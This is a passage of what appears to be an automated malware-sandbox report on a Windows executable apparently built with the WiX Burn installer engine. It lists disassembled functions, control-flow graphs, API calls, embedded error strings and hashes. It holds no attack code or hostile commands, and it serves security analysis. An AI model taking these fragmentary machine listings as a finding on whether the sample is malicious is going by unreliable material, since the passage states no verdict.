                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(008E6570,008E6570,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDCF4
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDCFE
                                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(008E6570,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDD51
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDD5B
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(008E6570,008E64D8,00000000,00000000,00000000,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDDD5
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDDDF
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(008E6570,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDE32
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDE3C
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(008E6570,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDE8F
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDE99
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(008E6570,008E6570,00000000,00000000,00000000,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDEEE
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDEF8
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(008E6570,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDF52
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(008E6570,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDFB2
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDFBC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLast$Read$Pointer
                                                                                                                                                                                                                                                                            • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data too short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$Invalid section info, cContainers too large: %u$PE$PE Header from file didn't match PE Header in memory.$burn$d:\a\wix4\wix4\src\burn\engine\section.cpp$feclient.dll
                                                                                                                                                                                                                                                                            • API String ID: 3909885910-3741805499
                                                                                                                                                                                                                                                                            • Opcode ID: f6885d8c18fc4dbf16d697d1aadc60ddb9739ec0621419ebe0574d3c01252c64
                                                                                                                                                                                                                                                                            • Instruction ID: e4da54b9503f1a087d6e553827771cbb3151c950d34499587c2afa8d776143ba
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6885d8c18fc4dbf16d697d1aadc60ddb9739ec0621419ebe0574d3c01252c64
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49220772A41374B7D731CA168C4AFABB6A8FB07B55F014159FE08FB280E6B09D44CB95
                                                                                                                                                                                                                                                                            Function 008EAA6F Relevance: 54.5, APIs: 1, Strings: 35, Instructions: 486COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 364 8eaa6f-8eb442 InitializeCriticalSection 365 8eb448-8eb46c call 8e813a 364->365 368 8eb46e-8eb481 365->368 369 8eb4ba-8eb4cd 365->369 368->365 370 8eb483-8eb49b call 8e8218 368->370 371 8eb4d2-8eb4dc call 8e1228 369->371 377 8eb49d-8eb4a1 370->377 378 8eb4a5-8eb4b8 370->378 376 8eb4df-8eb4ef call 9267e6 371->376 377->370 380 8eb4a3 377->380 378->371 380->376
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(0090401A,008E7D5B,x86,008E7DDB), ref: 008EAA8F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalInitializeSection
                                                                                                                                                                                                                                                                            • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$Failed to add well-known variable: %ls.$InstallerName$InstallerVersion$LogonUser$RebootPending$SeShutdownPrivilege$WixBundleAction$WixBundleActiveParent$WixBundleCommandLineAction$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInProgressName$WixBundleInstalled$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleManufacturer$WixBundleName$WixBundleOriginalSource$WixBundleOriginalSourceFolder$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion$d:\a\wix4\wix4\src\burn\engine\variable.cpp$x86
                                                                                                                                                                                                                                                                            • API String ID: 32694325-1675731463
                                                                                                                                                                                                                                                                            • Opcode ID: 436068943a535bcdf98cb1f9ea5a2e3261b98603daf77d3299e48e151bce677d
                                                                                                                                                                                                                                                                            • Instruction ID: cfab39c2058caaf4042f17746542bcc8da96d4beb529d66bea1f04feb66a7ba9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 436068943a535bcdf98cb1f9ea5a2e3261b98603daf77d3299e48e151bce677d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C526BB0C117689FDB61CF5ACD487CDBAF8BB49709F5085DAE64CA6250D7B00A88CF85
                                                                                                                                                                                                                                                                            Function 0090E386 Relevance: 49.4, APIs: 16, Strings: 12, Instructions: 351COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 382 90e386-90e39d SetEvent 383 90e3e5-90e3f3 call 8e174a 382->383 384 90e39f-90e3a9 GetLastError 382->384 392 90e3f5-90e414 call 8e1228 383->392 393 90e419-90e424 ResetEvent 383->393 385 90e3b6 384->385 386 90e3ab-90e3b4 384->386 388 90e3b8 385->388 389 90e3bd-90e3e0 call 8e1225 385->389 386->385 388->389 402 90e7d8 389->402 404 90e7e4-90e7e9 392->404 394 90e426-90e430 GetLastError 393->394 395 90e46c-90e472 393->395 398 90e432-90e43b 394->398 399 90e43d 394->399 400 90e4b2-90e4cb call 8e2ec6 395->400 401 90e474-90e477 395->401 398->399 405 90e444-90e467 call 8e1225 399->405 406 90e43f 399->406 417 90e4f4-90e4ff SetEvent 400->417 418 90e4cd-90e4ef call 8e1228 400->418 407 90e4a8-90e4ad 401->407 408 90e479-90e4a3 call 8e1225 401->408 409 90e7d9-90e7de call 8e1228 402->409 412 90e7eb 404->412 413 90e7ee-90e7f4 404->413 405->402 406->405 407->404 408->402 425 90e7e1-90e7e3 409->425 412->413 423 90e501-90e50b GetLastError 417->423 424 90e547-90e555 call 8e174a 417->424 418->425 427 90e518 423->427 428 90e50d-90e516 423->428 434 90e573-90e57e ResetEvent 424->434 435 90e557-90e56e 424->435 425->404 430 90e51a 427->430 431 90e51f-90e542 call 8e1225 427->431 428->427 430->431 431->402 436 90e580-90e58a GetLastError 434->436 437 90e5c6-90e5cd 434->437 435->409 439 90e597 436->439 440 90e58c-90e595 436->440 441 90e5d3-90e5d6 437->441 442 90e66d-90e690 437->442 443 90e599 439->443 444 90e59e-90e5c1 call 8e1225 439->444 440->439 445 90e622-90e626 call 8e540b 441->445 446 90e5d8-90e5db 441->446 454 90e692-90e69c GetLastError 442->454 455 90e6dc-90e6ee SetFilePointerEx 442->455 443->444 444->402 452 90e62b-90e630 445->452 450 90e61b-90e61d 446->450 451 90e5dd-90e5e0 446->451 450->404 456 90e611-90e616 451->456 457 90e5e2-90e60c call 8e1225 451->457 458 90e632-90e65a call 8e1225 452->458 459 90e65f-90e668 452->459 462 90e6a9 454->462 463 90e69e-90e6a7 454->463 460 90e6f0-90e6fa GetLastError 455->460 461 90e736-90e741 SetEndOfFile 455->461 456->425 457->402 458->402 459->425 466 90e707 460->466 467 90e6fc-90e705 460->467 468 90e743-90e74d GetLastError 461->468 469 90e786-90e795 SetFilePointerEx 461->469 470 90e6b0-90e6d6 call 8e1225 462->470 471 90e6ab 462->471 463->462 476 90e709 466->476 477 90e70e-90e731 call 8e1225 466->477 467->466 478 90e75a 468->478 479 90e74f-90e758 468->479 469->425 474 90e797-90e7a1 GetLastError 469->474 470->455 471->470 481 90e7a3-90e7ac 474->481 482 90e7ae 474->482 476->477 477->402 484 90e761-90e784 call 8e1225 478->484 485 90e75c 478->485 479->478 481->482 487 90e7b0 482->487 488 90e7b5-90e7d3 call 8e1225 482->488 484->402 485->484 487->488 488->402
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,0090DE75,?,?), ref: 0090E395
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,0090DE75,?,?), ref: 0090E39F
                                                                                                                                                                                                                                                                            • ResetEvent.KERNEL32(?,?,000000FF,?,?,?,?,0090DE75,?,?), ref: 0090E41C
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,0090DE75,?,?), ref: 0090E426
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorEventLast$Reset
                                                                                                                                                                                                                                                                            • String ID: @1Wu$Failed to allocate buffer for stream.$Failed to copy stream name: %hs$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1970322416-2021767095
                                                                                                                                                                                                                                                                            • Opcode ID: 04ccd43e12d9ef657e129c84311cf728386e52b2221c87ad72d744e92fe4a830
                                                                                                                                                                                                                                                                            • Instruction ID: 716e7c81072bc34a13cfd64c20063a263401e21f45ca1517bc2dda73a09eb484
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04ccd43e12d9ef657e129c84311cf728386e52b2221c87ad72d744e92fe4a830
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ACA12576AC1731BBEB3257695C4EF6B2C68EB46F20F120914BE14BF2D1E6A4DC0092D5
                                                                                                                                                                                                                                                                            Function 008FCD75 Relevance: 37.0, APIs: 9, Strings: 12, Instructions: 258fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 569 8fcd75-8fcdc6 571 8fcdc8-8fcdd2 GetLastError 569->571 572 8fce17-8fce25 call 9439dd 569->572 574 8fcddf 571->574 575 8fcdd4-8fcddd 571->575 579 8fce4e-8fce5a call 942b2e 572->579 580 8fce27-8fce49 call 8e1228 572->580 577 8fcde6-8fce12 call 8e1225 call 8e1228 574->577 578 8fcde1 574->578 575->574 592 8fd054-8fd064 call 9267e6 577->592 578->577 586 8fce5f-8fce63 579->586 588 8fd04d 580->588 589 8fce8f-8fce94 586->589 590 8fce65-8fce8a call 8e1228 586->590 588->592 589->588 594 8fce9a-8fcea9 SetFilePointerEx 589->594 590->588 597 8fceab-8fceb5 GetLastError 594->597 598 8fcef2-8fcf02 call 943f70 594->598 601 8fceb7-8fcec0 597->601 602 8fcec2 597->602 607 8fcf1b-8fcf2c SetFilePointerEx 598->607 608 8fcf04-8fcf16 598->608 601->602 603 8fcec9-8fcee7 call 8e1225 602->603 604 8fcec4 602->604 614 8fceec-8fceed 603->614 604->603 611 8fcf2e-8fcf38 GetLastError 607->611 612 8fcf74-8fcf84 call 943f70 607->612 610 8fd040 608->610 615 8fd045-8fd04a call 8e1228 610->615 616 8fcf3a-8fcf43 611->616 617 8fcf45 611->617 623 8fcf9d-8fcfad call 943f70 612->623 624 8fcf86-8fcf98 612->624 614->615 615->588 616->617 620 8fcf4c-8fcf6f call 8e1225 617->620 621 8fcf47 617->621 620->614 621->620 629 8fcfaf-8fcfc1 623->629 630 8fcfc3-8fcfd4 SetFilePointerEx 623->630 624->610 629->610 631 8fd01c-8fd02c call 943f70 630->631 632 8fcfd6-8fcfe0 GetLastError 630->632 631->588 640 8fd02e-8fd03b 631->640 634 8fcfed 632->634 635 8fcfe2-8fcfeb 632->635 637 8fcfef 634->637 638 8fcff4-8fd012 call 8e1225 634->638 635->634 637->638 638->631 640->610
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 008FCDBB
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FCDC8
                                                                                                                                                                                                                                                                              • Part of subcall function 00942B2E: ReadFile.KERNELBASE(?,?,00000000,?,00000000,?), ref: 00942BBF
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,0094E818,00000000,00000000,00000000,?,00000000,0094E860,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 008FCEA1
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FCEAB
                                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000,?,00000000,0094E860,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 008FD04E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$ErrorLast$CloseCreateHandlePointerRead
                                                                                                                                                                                                                                                                            • String ID: Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$d:\a\wix4\wix4\src\burn\engine\cache.cpp$msi.dll$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 3456208997-4105028820
                                                                                                                                                                                                                                                                            • Opcode ID: 1c5029bc58e9c99a8f831aca2eabb7cb0f868f17a38a4ce15b499a04c9df9052
                                                                                                                                                                                                                                                                            • Instruction ID: afeff875fd3ab797a294cafc6b3f22f93259dae305a2bdefee943fa090d2c30c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c5029bc58e9c99a8f831aca2eabb7cb0f868f17a38a4ce15b499a04c9df9052
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D71C672A8072A76E72196768C0AFBB696CFB85B51F114114BF44FB1C1EAA0DC1087E1
                                                                                                                                                                                                                                                                            Function 00946323 Relevance: 37.0, APIs: 3, Strings: 18, Instructions: 236registrylibraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 642 946323-94634c call 8e1839 645 94636c-946384 GetProcAddress 642->645 646 94634e-946367 call 8e1228 642->646 648 946411-946431 call 93cba8 645->648 649 94638a-94639e GetCurrentProcess call 93beb7 645->649 653 946586-94658a 646->653 656 946444-946446 648->656 657 946433-946439 648->657 658 9463a0-9463ac 649->658 659 9463b1-9463b5 649->659 660 94658c-946595 RegCloseKey 653->660 661 946599-94659d 653->661 663 946448-94644a 656->663 657->656 662 94643b-946442 657->662 664 946565-946572 call 8e1228 658->664 659->648 665 9463b7-9463c9 call 94234b 659->665 660->661 666 9465a7-9465ab 661->666 667 94659f-9465a2 call 8e367f 661->667 662->663 669 94644c-946458 663->669 670 94645d-94645f 663->670 677 946584-946585 664->677 679 9463dc-9463ee call 8e5573 665->679 680 9463cb-9463d7 665->680 667->666 669->664 674 946465-94647a call 946232 670->674 675 946523-946535 call 94234b 670->675 687 94647c-946488 674->687 688 94648d-946490 674->688 685 946545-946557 call 8e5573 675->685 686 946537-946543 675->686 677->653 693 9463f0-9463fc 679->693 694 946401-94640f 679->694 680->664 699 946574-946582 685->699 700 946559-946563 685->700 686->664 687->664 691 9464c7-9464d3 call 946232 688->691 692 946492-9464a4 call 8e5573 688->692 701 9464d8-9464dc 691->701 702 9464a6-9464b2 692->702 703 9464b7-9464c5 692->703 693->664 694->648 699->677 700->664 704 9464ec-9464ef 701->704 705 9464de-9464ea 701->705 702->664 703->691 704->675 706 9464f1-946503 call 8e5573 704->706 705->664 709 946505-946511 706->709 710 946513-946521 706->710 709->664 710->675
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?), ref: 008E1855
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: GetLastError.KERNEL32(?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E1866
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00946376
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 0094638E
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000004,00000001,TEMP,00000000,80000002,System\CurrentControlSet\Control\Session Manager\Environment,00020019,00000000), ref: 0094658F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get system Windows subdirectory path SystemTemp., xrefs: 009463CB
                                                                                                                                                                                                                                                                            • Failed to get temp path from system TEMP., xrefs: 009464DE
                                                                                                                                                                                                                                                                            • Failed to check if running as system., xrefs: 009463A0
                                                                                                                                                                                                                                                                            • Failed to ensure array size for system TMP value., xrefs: 009464A6
                                                                                                                                                                                                                                                                            • kernel32.dll, xrefs: 0094633E
                                                                                                                                                                                                                                                                            • TMP, xrefs: 00946469
                                                                                                                                                                                                                                                                            • SystemTemp, xrefs: 009463BB
                                                                                                                                                                                                                                                                            • Failed to get temp path from system TMP., xrefs: 0094647C
                                                                                                                                                                                                                                                                            • Failed to ensure array size for Windows\TEMP value., xrefs: 00946559
                                                                                                                                                                                                                                                                            • Failed to open system environment registry key., xrefs: 0094644C
                                                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager\Environment, xrefs: 0094641A
                                                                                                                                                                                                                                                                            • Failed to ensure array size for system TEMP value., xrefs: 00946505
                                                                                                                                                                                                                                                                            • Failed to ensure array size for Windows\SystemTemp value., xrefs: 009463F0
                                                                                                                                                                                                                                                                            • Failed to get system Windows subdirectory path TEMP., xrefs: 00946537
                                                                                                                                                                                                                                                                            • TEMP, xrefs: 009464CB, 00946527
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path3utl.cpp, xrefs: 0094635A, 00946565
                                                                                                                                                                                                                                                                            • Failed to load kernel32.dll, xrefs: 0094634E
                                                                                                                                                                                                                                                                            • GetTempPath2W, xrefs: 0094636E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressCloseCurrentErrorLastLibraryLoadProcProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to check if running as system.$Failed to ensure array size for Windows\SystemTemp value.$Failed to ensure array size for Windows\TEMP value.$Failed to ensure array size for system TEMP value.$Failed to ensure array size for system TMP value.$Failed to get system Windows subdirectory path SystemTemp.$Failed to get system Windows subdirectory path TEMP.$Failed to get temp path from system TEMP.$Failed to get temp path from system TMP.$Failed to load kernel32.dll$Failed to open system environment registry key.$GetTempPath2W$SystemTemp$System\CurrentControlSet\Control\Session Manager\Environment$TEMP$TMP$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path3utl.cpp$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 1593934338-44121869
                                                                                                                                                                                                                                                                            • Opcode ID: 26fabf82f406a694c306d4c770a0ced6b7f120d22a9396ba86d3ee978e70866f
                                                                                                                                                                                                                                                                            • Instruction ID: c18b5e00b54e82c3c8f098baf24ba8079889d8780799e3b50882f75f862d1255
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 26fabf82f406a694c306d4c770a0ced6b7f120d22a9396ba86d3ee978e70866f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B971D8B2F80725BBDF319A50CC4BFAE7A64EF06B55F114150BA04BB2D1D3B49E00DA82
                                                                                                                                                                                                                                                                            Function 0093F5A7 Relevance: 36.8, APIs: 9, Strings: 12, Instructions: 96libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 711 93f5a7-93f5c7 call 8e18c0 714 93f5ea-93f5f7 call 943be0 711->714 715 93f5c9-93f5e5 call 8e1228 711->715 718 93f5fc-93f619 GetProcAddress 714->718 722 93f740-93f744 715->722 720 93f620-93f63d GetProcAddress 718->720 721 93f61b 718->721 723 93f644-93f661 GetProcAddress 720->723 724 93f63f 720->724 721->720 725 93f746-93f749 call 8e367f 722->725 726 93f74e-93f752 722->726 727 93f663 723->727 728 93f668-93f685 GetProcAddress 723->728 724->723 725->726 727->728 730 93f687 728->730 731 93f68c-93f6a9 GetProcAddress 728->731 730->731 732 93f6b0-93f6cd GetProcAddress 731->732 733 93f6ab 731->733 734 93f6d4-93f6f1 GetProcAddress 732->734 735 93f6cf 732->735 733->732 736 93f6f3 734->736 737 93f6f8-93f6ff 734->737 735->734 736->737 738 93f701-93f712 GetProcAddress 737->738 739 93f717-93f71e 737->739 738->739 740 93f720-93f731 GetProcAddress 739->740 741 93f736 739->741 740->741 741->722
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 0093F607
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 0093F62B
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 0093F64F
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 0093F673
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 0093F697
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 0093F6BB
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 0093F6DF
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(MsiBeginTransactionW), ref: 0093F70C
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(MsiEndTransaction), ref: 0093F72B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • MsiSourceListAddSourceExW, xrefs: 0093F6D4
